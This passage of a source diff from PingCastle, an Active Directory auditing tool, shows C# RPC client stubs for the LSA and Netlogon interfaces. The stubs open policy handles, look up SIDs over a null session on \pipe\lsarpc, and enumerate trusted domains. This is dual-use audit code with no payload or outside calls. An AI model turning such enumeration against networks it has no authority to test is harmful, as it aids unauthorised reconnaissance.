0x4c,0x00,0xee,0xff,0x02,0x43,0x4c,0x00,0xe8,0xff,0x08,0x40,0x5c,0x5b,0xb7,0x08,0x00,0x00,0x00,0x00,0xe8,0x03,0x00,0x00,0x1b,0x03,0x04,0x00,0x19,0x00,
0x10,0x00,0x00,0x00,0x08,0x5b,0x1a,0x03,0x18,0x00,0x00,0x00,0x0c,0x00,0x02,0x43,0x36,0x4c,0x00,0xdd,0xff,0x40,0x5c,0x5b,0x12,0x00,0xe0,0xff,0x1c,0x01,
0x02,0x00,0x17,0x55,0x02,0x00,0x01,0x00,0x17,0x55,0x00,0x00,0x01,0x00,0x05,0x5b,0x1a,0x03,0x10,0x00,0x00,0x00,0x08,0x00,0x06,0x06,0x40,0x36,0x5c,0x5b,
0x12,0x00,0xde,0xff,0x1a,0x03,0x18,0x00,0x00,0x00,0x08,0x00,0x4c,0x00,0xe4,0xff,0x36,0x5b,0x12,0x00,0x9a,0xfe,0x1a,0x03,0x18,0x00,0x00,0x00,0x08,0x00,
0x4c,0x00,0xd2,0xff,0x36,0x5b,0x12,0x00,0x88,0xfe,0x1a,0x03,0x10,0x00,0x00,0x00,0x00,0x00,0x4c,0x00,0xc0,0xff,0x5c,0x5b,0x1a,0x01,0x04,0x00,0x00,0x00,
0x00,0x00,0x0d,0x5b,0x1a,0x03,0x20,0x00,0x00,0x00,0x00,0x00,0x4c,0x00,0xa8,0xff,0x4c,0x00,0xa4,0xff,0x5c,0x5b,0x15,0x07,0x10,0x00,0x4c,0x00,0x3e,0xff,
0x4c,0x00,0x3a,0xff,0x5c,0x5b,0x15,0x00,0x01,0x00,0x02,0x5b,0x15,0x00,0x02,0x00,0x02,0x02,0x5c,0x5b,0x1d,0x00,0x08,0x00,0x01,0x5b,0x15,0x03,0x10,0x00,
0x08,0x06,0x06,0x4c,0x00,0xf1,0xff,0x5b,0x1a,0x03,0x48,0x00,0x00,0x00,0x14,0x00,0x4c,0x00,0x68,0xff,0x4c,0x00,0x64,0xff,0x4c,0x00,0x60,0xff,0x4c,0x00,
0xde,0xff,0x36,0x5b,0x12,0x00,0x12,0xfe,0x11,0x00,0x30,0x00,0xb7,0x08,0x00,0x00,0x00,0x00,0x00,0x50,0x00,0x00,0x1a,0x03,0x08,0x00,0x00,0x00,0x04,0x00,
0x36,0x5b,0x12,0x00,0xf6,0xfd,0x21,0x03,0x00,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x4c,0x00,0xe0,0xff,0x5c,0x5b,0x1a,0x03,
0x10,0x00,0x00,0x00,0x0a,0x00,0x4c,0x00,0xc8,0xff,0x40,0x36,0x5c,0x5b,0x12,0x00,0xd8,0xff,0x11,0x14,0x02,0x00,0x12,0x00,0x2a,0x00,0x1a,0x03,0x18,0x00,
0x00,0x00,0x08,0x00,0x4c,0x00,0xfc,0xfe,0x36,0x5b,0x12,0x00,0xb2,0xfd,0x21,0x03,0x00,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0xff,0xff,0xff,0xff,0x00,0x00,
0x4c,0x00,0xdc,0xff,0x5c,0x5b,0x1a,0x03,0x18,0x00,0x00,0x00,0x08,0x00,0x08,0x40,0x36,0x08,0x40,0x5b,0x12,0x00,0xda,0xff,0x11,0x00,0x34,0x00,0xb7,0x08,
0x00,0x00,0x00,0x00,0x00,0x50,0x00,0x00,0x1a,0x03,0x20,0x00,0x00,0x00,0x00,0x00,0x0d,0x40,0x4c,0x00,0xb2,0xfe,0x08,0x40,0x5c,0x5b,0x21,0x03,0x00,0x00,
0x19,0x00,0x00,0x00,0x01,0x00,0xff,0xff,0xff,0xff,0x00,0x00,0x4c,0x00,0xdc,0xff,0x5c,0x5b,0x1a,0x03,0x10,0x00,0x00,0x00,0x0a,0x00,0x4c,0x00,0xc4,0xff,
0x40,0x36,0x5c,0x5b,0x12,0x00,0xd8,0xff,0x11,0x08,0x08,0x5c,0x00
};
[StructLayout(LayoutKind.Sequential)]
internal struct LSAPR_OBJECT_ATTRIBUTES
{
public UInt32 Length;
public IntPtr RootDirectory;
public IntPtr ObjectName;
public UInt32 Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
}
[StructLayout(LayoutKind.Sequential)]
private struct LSAPR_POLICY_ACCOUNT_DOM_INFO
{
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr buffer;
public IntPtr DomainSid;
}
[StructLayout(LayoutKind.Sequential)]
internal struct LSAPR_SID_ENUM_BUFFER
{
public UInt32 Entries;
public IntPtr SidInfo;
}
[StructLayout(LayoutKind.Sequential)]
private struct LSAPR_REFERENCED_DOMAIN_LIST
{
public UInt32 Entries;
public IntPtr Domains;
public UInt32 MaxEntries;
}
[StructLayout(LayoutKind.Sequential)]
private struct LSAPR_TRUST_INFORMATION
{
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr buffer;
public IntPtr Sid;
};
[StructLayout(LayoutKind.Sequential)]
private struct LSAPR_TRANSLATED_NAMES
{
public UInt32 Entries;
public IntPtr Names;
}
[StructLayout(LayoutKind.Sequential)]
private struct LSAPR_TRANSLATED_NAME
{
public IntPtr Use;
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr buffer;
public UInt32 DomainIndex;
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public lsa()
{
Guid interfaceId = new Guid("12345778-1234-ABCD-EF00-0123456789AB");
if (IntPtr.Size == 8)
{
InitializeStub(interfaceId, MIDL_ProcFormatStringx64, MIDL_TypeFormatStringx64, "\\pipe\\lsarpc", 0);
}
else
{
InitializeStub(interfaceId, MIDL_ProcFormatStringx86, MIDL_TypeFormatStringx86, "\\pipe\\lsarpc", 0);
}
UseNullSession = true;
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
~lsa()
{
freeStub();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 LsarOpenPolicy(string SystemName, UInt32 DesiredAccess, out IntPtr PolicyHandle)
{
IntPtr intptrSystemName = Marshal.StringToHGlobalUni(SystemName);
LSAPR_OBJECT_ATTRIBUTES objectAttributes = new LSAPR_OBJECT_ATTRIBUTES();
PolicyHandle = IntPtr.Zero;
IntPtr result = IntPtr.Zero;
try
{
PolicyHandle = IntPtr.Zero;
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(194), intptrSystemName, ref objectAttributes, DesiredAccess, out PolicyHandle);
}
else
{
IntPtr tempValue1 = new IntPtr();
GCHandle handle1 = GCHandle.Alloc(tempValue1, GCHandleType.Pinned);
IntPtr tempValuePointer1 = handle1.AddrOfPinnedObject();
GCHandle handle2 = GCHandle.Alloc(objectAttributes, GCHandleType.Pinned);
IntPtr tempValuePointer2 = handle2.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(182, intptrSystemName, tempValuePointer2, new IntPtr((int)DesiredAccess), tempValuePointer1);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
PolicyHandle = Marshal.ReadIntPtr(tempValuePointer1);
}
finally
{
handle1.Free();
handle2.Free();
}
}
}
catch (SEHException)
{
Trace.WriteLine("LsarOpenPolicy failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
finally
{
if (intptrSystemName != IntPtr.Zero)
Marshal.FreeHGlobal(intptrSystemName);
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 LsarClose(ref IntPtr ServerHandle)
{
IntPtr result = IntPtr.Zero;
try
{
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(0), ref ServerHandle);
}
else
{
IntPtr tempValue = ServerHandle;
GCHandle handle = GCHandle.Alloc(tempValue, GCHandleType.Pinned);
IntPtr tempValuePointer = handle.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(0, tempValuePointer);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
ServerHandle = Marshal.ReadIntPtr(tempValuePointer);
}
finally
{
handle.Free();
}
}
}
catch (SEHException)
{
Trace.WriteLine("LsarClose failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 LsarQueryInformationPolicy(IntPtr PolicyHandle, UInt32 InformationClass, out LSA_DOMAIN_INFORMATION PolicyInformation)
{
IntPtr result = IntPtr.Zero;
try
{
IntPtr IntPtrPolicyInformation = IntPtr.Zero;
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(256), PolicyHandle, InformationClass, out IntPtrPolicyInformation);
}
else
{
IntPtr tempValue1 = IntPtr.Zero;
GCHandle handle1 = GCHandle.Alloc(tempValue1, GCHandleType.Pinned);
IntPtr tempValuePointer1 = handle1.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(242, PolicyHandle, new IntPtr(InformationClass), tempValuePointer1);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
IntPtrPolicyInformation = Marshal.ReadIntPtr(tempValuePointer1);
}
finally
{
handle1.Free();
}
}
PolicyInformation = Unmarshal_LSAPR_POLICY_ACCOUNT_DOM_INFO(IntPtrPolicyInformation);
}
catch (SEHException)
{
PolicyInformation = null;
Trace.WriteLine("LsarQueryInformationPolicy failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
private LSA_DOMAIN_INFORMATION Unmarshal_LSAPR_POLICY_ACCOUNT_DOM_INFO(IntPtr IntPtrPolicyInformation)
{
if (IntPtrPolicyInformation == IntPtr.Zero)
return null;
LSAPR_POLICY_ACCOUNT_DOM_INFO Buffer = (LSAPR_POLICY_ACCOUNT_DOM_INFO)Marshal.PtrToStructure(IntPtrPolicyInformation, typeof(LSAPR_POLICY_ACCOUNT_DOM_INFO));
LSA_DOMAIN_INFORMATION output = new LSA_DOMAIN_INFORMATION();
output.DomainName = Marshal.PtrToStringUni(Buffer.buffer, Buffer.Length / 2);
output.DomainSid = new SecurityIdentifier(Buffer.DomainSid);
if (Buffer.buffer != IntPtr.Zero && Buffer.MaximumLength > 0)
FreeMemory(Buffer.buffer);
if (Buffer.DomainSid != IntPtr.Zero)
FreeMemory(Buffer.DomainSid);
FreeMemory(IntPtrPolicyInformation);
return output;
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 LsarLookupSids(IntPtr PolicyHandle, SecurityIdentifier[] SidEnumBuffer, out LSA_LOOKUP_RESULT[] LookupResult, UInt32 LookupLevel,out UInt32 MappedCount)
{
List<GCHandle> HandleToFree = new List<GCHandle>();
IntPtr result = IntPtr.Zero;
LookupResult = null;
MappedCount = 0;
try
{
IntPtr IntPtrReferencedDomains = IntPtr.Zero;
LSAPR_TRANSLATED_NAMES TranslatedNames = new LSAPR_TRANSLATED_NAMES();
GCHandle handleTranslatedNames = GCHandle.Alloc(TranslatedNames, GCHandleType.Pinned);
// translatedNamesValuePointer points to a copy of TranslatedNames
IntPtr IntPtrTranslatedNames = handleTranslatedNames.AddrOfPinnedObject();
HandleToFree.Add(handleTranslatedNames);
LSAPR_SID_ENUM_BUFFER enumBuffer = Marshal_LSAPR_SID_ENUM_BUFFER(SidEnumBuffer, HandleToFree);
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(522), PolicyHandle, enumBuffer, out IntPtrReferencedDomains, IntPtrTranslatedNames, LookupLevel, out MappedCount);
}
else
{
GCHandle handle1 = GCHandle.Alloc(enumBuffer, GCHandleType.Pinned);
IntPtr tempValuePointer1 = handle1.AddrOfPinnedObject();
IntPtr tempValue2 = IntPtr.Zero;
GCHandle handle2 = GCHandle.Alloc(tempValue2, GCHandleType.Pinned);
IntPtr tempValuePointer2 = handle2.AddrOfPinnedObject();
IntPtr tempValue4 = IntPtr.Zero;
GCHandle handle4 = GCHandle.Alloc(tempValue4, GCHandleType.Pinned);
IntPtr tempValuePointer4 = handle4.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(492, PolicyHandle, tempValuePointer1, tempValuePointer2, IntPtrTranslatedNames, new IntPtr(LookupLevel), tempValuePointer4);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
IntPtrReferencedDomains = Marshal.ReadIntPtr(tempValuePointer2);
MappedCount = (UInt32)Marshal.ReadInt32(tempValuePointer4);
}
finally
{
handle1.Free();
handle2.Free();
handle4.Free();
}
}
if (result == IntPtr.Zero || result == new IntPtr(0x00000107))
{
LookupResult = Marshal_LsarLookupSids_Output(IntPtrReferencedDomains, IntPtrTranslatedNames);
}
}
catch (SEHException)
{
Trace.WriteLine("LsarLookupSids failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
finally
{
foreach (GCHandle handle in HandleToFree)
{
handle.Free();
}
}
return (int) result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
private LSAPR_SID_ENUM_BUFFER Marshal_LSAPR_SID_ENUM_BUFFER(SecurityIdentifier[] SidEnumBuffer, List<GCHandle> HandleToFree)
{
LSAPR_SID_ENUM_BUFFER output = new LSAPR_SID_ENUM_BUFFER();
output.Entries = (UInt32) SidEnumBuffer.Length;
IntPtr[] sidPtr = new IntPtr[SidEnumBuffer.Length];
for (int i = 0; i < SidEnumBuffer.Length; i++)
{
byte[] sid = new byte[SidEnumBuffer[i].BinaryLength];
SidEnumBuffer[i].GetBinaryForm(sid, 0);
GCHandle handlesid = GCHandle.Alloc(sid, GCHandleType.Pinned);
HandleToFree.Add(handlesid);
sidPtr[i] = handlesid.AddrOfPinnedObject();
}
GCHandle handle = GCHandle.Alloc(sidPtr, GCHandleType.Pinned);
HandleToFree.Add(handle);
output.SidInfo = handle.AddrOfPinnedObject();
return output;
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
private LSA_LOOKUP_RESULT[] Marshal_LsarLookupSids_Output(IntPtr IntPtrReferencedDomains, IntPtr IntPtrTranslatedNames)
{
if (IntPtrReferencedDomains == IntPtr.Zero || IntPtrTranslatedNames == IntPtr.Zero)
return null;
LSAPR_REFERENCED_DOMAIN_LIST ReferencedDomains = (LSAPR_REFERENCED_DOMAIN_LIST)Marshal.PtrToStructure(IntPtrReferencedDomains, typeof(LSAPR_REFERENCED_DOMAIN_LIST));
LSAPR_TRANSLATED_NAMES TranslatedNames = (LSAPR_TRANSLATED_NAMES)Marshal.PtrToStructure(IntPtrTranslatedNames, typeof(LSAPR_TRANSLATED_NAMES));
int SizeTranslatedName = Marshal.SizeOf(typeof(LSAPR_TRANSLATED_NAME));
int SizeTrustInformation = Marshal.SizeOf(typeof(LSAPR_TRUST_INFORMATION));
string[] referencedDomainsString = new string[ReferencedDomains.Entries];
SecurityIdentifier[] referencedDomainsSid = new SecurityIdentifier[ReferencedDomains.Entries];
for (UInt32 i = 0; i < ReferencedDomains.Entries; i++)
{
LSAPR_TRUST_INFORMATION trustInformation = (LSAPR_TRUST_INFORMATION)Marshal.PtrToStructure(new IntPtr(ReferencedDomains.Domains.ToInt64() + SizeTrustInformation * i), typeof(LSAPR_TRUST_INFORMATION));
if (trustInformation.buffer != IntPtr.Zero)
referencedDomainsString[i] = Marshal.PtrToStringUni(trustInformation.buffer, trustInformation.Length / 2);
if (trustInformation.Sid != null)
referencedDomainsSid[i] = new SecurityIdentifier(trustInformation.Sid);
if (trustInformation.buffer != IntPtr.Zero && trustInformation.MaximumLength > 0)
FreeMemory(trustInformation.buffer);
if (trustInformation.Sid != IntPtr.Zero)
FreeMemory(trustInformation.Sid);
}
LSA_LOOKUP_RESULT[] output = new LSA_LOOKUP_RESULT[TranslatedNames.Entries];
for (UInt32 i = 0; i < TranslatedNames.Entries; i++)
{
LSAPR_TRANSLATED_NAME translatedName = (LSAPR_TRANSLATED_NAME)Marshal.PtrToStructure(new IntPtr(TranslatedNames.Names.ToInt64() + SizeTranslatedName * i), typeof(LSAPR_TRANSLATED_NAME));
output[i] = new LSA_LOOKUP_RESULT();
if (translatedName.buffer != IntPtr.Zero)
output[i].TranslatedName = Marshal.PtrToStringUni(translatedName.buffer, translatedName.Length / 2);
output[i].Use = (SID_NAME_USE) translatedName.Use;
output[i].DomainName = referencedDomainsString[translatedName.DomainIndex];
output[i].DomainSid = referencedDomainsSid[translatedName.DomainIndex];
if (translatedName.buffer != IntPtr.Zero && translatedName.MaximumLength > 0)
FreeMemory(translatedName.buffer);
}
FreeMemory(ReferencedDomains.Domains);
FreeMemory(TranslatedNames.Names);
FreeMemory(IntPtrReferencedDomains);
return output;
}
}
}

135
RPC/nativemethods.cs Normal file
View File

@ -0,0 +1,135 @@
//
// Copyright (c) Ping Castle. All rights reserved.
// https://www.pingcastle.com
//
// Licensed under the Non-Profit OSL. See LICENSE file in the project root for full license information.
//
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
namespace PingCastle.RPC
{
internal class NativeMethods
{
[DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingFromStringBindingW",
CallingConvention = CallingConvention.StdCall,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern Int32 RpcBindingFromStringBinding(String bindingString, out IntPtr lpBinding);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, ref IntPtr Handle);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr intptrServer, int flag, ref PingCastle.RPC.nrpc.NETLOGON_TRUSTED_DOMAIN_ARRAY output);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr intptrSystemName, ref PingCastle.RPC.lsa.LSAPR_OBJECT_ATTRIBUTES objectAttributes, UInt32 DesiredAccess, out IntPtr PolicyHandle);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr PolicyHandle, UInt32 InformationClass, out IntPtr IntPtrPolicyInformation);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr PolicyHandle, PingCastle.RPC.lsa.LSAPR_SID_ENUM_BUFFER enumBuffer, out IntPtr IntPtrReferencedDomains, IntPtr IntPtrTranslatedNames, UInt32 LookupLevel, out UInt32 MappedCount);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr intptrServer, out IntPtr ServerHandle, UInt32 DesiredAccess);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr ServerHandle, ref IntPtr EnumerationContext, out IntPtr IntptrBuffer, UInt32 PreferedMaximumLength, out UInt32 CountReturned);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr ServerHandle, PingCastle.NativeMethods.UNICODE_STRING NameString, out IntPtr sid);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr ServerHandle, Int32 DesiredAccess, byte[] sid, out IntPtr DomainHandle);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr DomainHandle, ref IntPtr EnumerationContext, Int32 UserAccountControl, out IntPtr IntptrBuffer, Int32 PreferedMaximumLength, ref UInt32 CountReturned);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x86(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr args);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr intPtr1, IntPtr intPtr2, string pPrinterName, out IntPtr pHandle, string pDatatype, ref rprn.DEVMODE_CONTAINER pDevModeContainer, int AccessRequired);
[DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern IntPtr NdrClientCall2x64(IntPtr intPtr1, IntPtr intPtr2, IntPtr hPrinter, uint fdwFlags, uint fdwOptions, string pszLocalMachine, uint dwPrinterLocal, IntPtr intPtr3);
[DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingFree", CallingConvention = CallingConvention.StdCall,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern Int32 RpcBindingFree(ref IntPtr lpString);
//#region RpcStringBindingCompose
[DllImport("Rpcrt4.dll", EntryPoint = "RpcStringBindingComposeW", CallingConvention = CallingConvention.StdCall,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern Int32 RpcStringBindingCompose(
String ObjUuid, String ProtSeq, String NetworkAddr, String Endpoint, String Options,
out IntPtr lpBindingString
);
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
internal struct SEC_WINNT_AUTH_IDENTITY
{
[MarshalAs(UnmanagedType.LPWStr)]
public string User;
public int UserLength;
[MarshalAs(UnmanagedType.LPWStr)]
public string Domain;
public int DomainLength;
[MarshalAs(UnmanagedType.LPWStr)]
public string Password;
public int PasswordLength;
public int Flags;
};
[StructLayout(LayoutKind.Sequential)]
public struct RPC_SECURITY_QOS
{
public Int32 Version;
public Int32 Capabilities;
public Int32 IdentityTracking;
public Int32 ImpersonationType;
};
[DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetAuthInfoExW", CallingConvention = CallingConvention.StdCall,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern Int32 RpcBindingSetAuthInfoEx(IntPtr lpBinding, string ServerPrincName,
UInt32 AuthnLevel, UInt32 AuthnSvc, ref SEC_WINNT_AUTH_IDENTITY AuthIdentity, UInt32 AuthzSvc, ref RPC_SECURITY_QOS SecurityQOS);
[DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetAuthInfoW", CallingConvention = CallingConvention.StdCall,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern Int32 RpcBindingSetAuthInfo(IntPtr lpBinding, string ServerPrincName,
UInt32 AuthnLevel, UInt32 AuthnSvc, ref SEC_WINNT_AUTH_IDENTITY AuthIdentity, UInt32 AuthzSvc);
[DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetAuthInfoW", CallingConvention = CallingConvention.StdCall,
CharSet = CharSet.Unicode, SetLastError = false)]
internal static extern Int32 RpcBindingSetAuthInfo(IntPtr lpBinding, string ServerPrincName,
UInt32 AuthnLevel, UInt32 AuthnSvc, UIntPtr pointer, UInt32 AuthzSvc);
[DllImport("Rpcrt4.dll", EntryPoint = "RpcBindingSetOption", CallingConvention = CallingConvention.StdCall,SetLastError= false)]
internal static extern Int32 RpcBindingSetOption(IntPtr Binding,UInt32 Option, UInt32 OptionValue);
[DllImport("advapi32.dll", SetLastError = true)]
internal static extern IntPtr GetSidSubAuthority(IntPtr sid, UInt32 subAuthorityIndex);
[DllImport("advapi32.dll", SetLastError = true)]
internal static extern IntPtr GetSidSubAuthorityCount(IntPtr psid);
}
}

195
RPC/nrpc.cs Normal file
View File

@ -0,0 +1,195 @@
//
// Copyright (c) Ping Castle. All rights reserved.
// https://www.pingcastle.com
//
// Licensed under the Non-Profit OSL. See LICENSE file in the project root for full license information.
//
using Microsoft.Win32.SafeHandles;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
namespace PingCastle.RPC
{
[DebuggerDisplay("{DnsDomainName} {NetbiosDomainName}")]
public class TrustedDomain
{
public string NetbiosDomainName;
public string DnsDomainName;
public TrustedDomainFlag Flags;
public int ParentIndex;
public int TrustType;
public int TrustAttributes;
public SecurityIdentifier DomainSid;
public Guid DomainGuid;
}
[Flags]
public enum TrustedDomainFlag
{
DS_DOMAIN_IN_FOREST = 1,
DS_DOMAIN_DIRECT_OUTBOUND = 2,
DS_DOMAIN_TREE_ROOT = 4,
DS_DOMAIN_PRIMARY = 8,
DS_DOMAIN_NATIVE_MODE = 16,
DS_DOMAIN_DIRECT_INBOUND =32,
}
public class nrpc : rpcapi
{
private static byte[] MIDL_ProcFormatStringx86 = new byte[] {
0x00,0x48,0x00,0x00,0x00,0x00,0x28,0x00,0x10,0x00,0x31,0x04,0x00,0x00,0x00,0x5c,0x08,0x00,0x08,0x00,0x47,0x04,0x08,0x03,0x01,0x00,0x00,0x00,0x00,
0x00,0x0b,0x00,0x00,0x00,0x02,0x00,0x48,0x00,0x04,0x00,0x08,0x00,0x13,0x21,0x08,0x00,0xaa,0x00,0x70,0x00,0x0c,0x00,0x08,0x00,0x00
};
private static byte[] MIDL_ProcFormatStringx64 = new byte[] {
0x00,0x48,0x00,0x00,0x00,0x00,0x28,0x00,0x20,0x00,0x31,0x08,0x00,0x00,0x00,0x5c,0x08,0x00,0x08,0x00,0x47,0x04,0x0a,0x03,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x0b,0x00,0x00,0x00,0x02,0x00,0x48,0x00,0x08,0x00,0x08,0x00,0x13,0x41,0x10,0x00,0x7c,0x00,0x70,0x00,0x18,0x00,0x08,0x00,0x00
};
private static byte[] MIDL_TypeFormatStringx86 = new byte[] {
0x00,0x00,0x12,0x08,0x25,0x5c,0x11,0x04,0xa2,0x00,0x1d,0x00,0x08,0x00,0x01,0x5b,0x15,0x03,0x10,0x00,0x08,0x06,0x06,0x4c,0x00,0xf1,0xff,0x5b,0x1d,
0x00,0x06,0x00,0x01,0x5b,0x15,0x00,0x06,0x00,0x4c,0x00,0xf4,0xff,0x5c,0x5b,0x1b,0x03,0x04,0x00,0x04,0x00,0xf9,0xff,0x01,0x00,0x08,0x5b,0x17,0x03,
0x08,0x00,0xf0,0xff,0x02,0x02,0x4c,0x00,0xe0,0xff,0x5c,0x5b,0x16,0x03,0x2c,0x00,0x4b,0x5c,0x46,0x5c,0x00,0x00,0x00,0x00,0x12,0x08,0x25,0x5c,0x46,
0x5c,0x04,0x00,0x04,0x00,0x12,0x08,0x25,0x5c,0x46,0x5c,0x18,0x00,0x18,0x00,0x12,0x00,0xd0,0xff,0x5b,0x08,0x08,0x08,0x08,0x08,0x08,0x08,0x4c,0x00,
0x9c,0xff,0x5c,0x5b,0x1b,0x03,0x2c,0x00,0x19,0x00,0x00,0x00,0x01,0x00,0x4b,0x5c,0x48,0x49,0x2c,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x12,
0x08,0x25,0x5c,0x04,0x00,0x04,0x00,0x12,0x08,0x25,0x5c,0x18,0x00,0x18,0x00,0x12,0x00,0x96,0xff,0x5b,0x4c,0x00,0x9f,0xff,0x5b,0x16,0x03,0x08,0x00,
0x4b,0x5c,0x46,0x5c,0x04,0x00,0x04,0x00,0x12,0x00,0xc0,0xff,0x5b,0x08,0x08,0x5b,0x00
};
private static byte[] MIDL_TypeFormatStringx64 = new byte[] {
0x00,0x00,0x12,0x08,0x25,0x5c,0x11,0x04,0x74,0x00,0x1d,0x00,0x08,0x00,0x01,0x5b,0x15,0x03,0x10,0x00,0x08,0x06,0x06,0x4c,0x00,0xf1,0xff,0x5b,0x1d,
0x00,0x06,0x00,0x01,0x5b,0x15,0x00,0x06,0x00,0x4c,0x00,0xf4,0xff,0x5c,0x5b,0x1b,0x03,0x04,0x00,0x04,0x00,0xf9,0xff,0x01,0x00,0x08,0x5b,0x17,0x03,
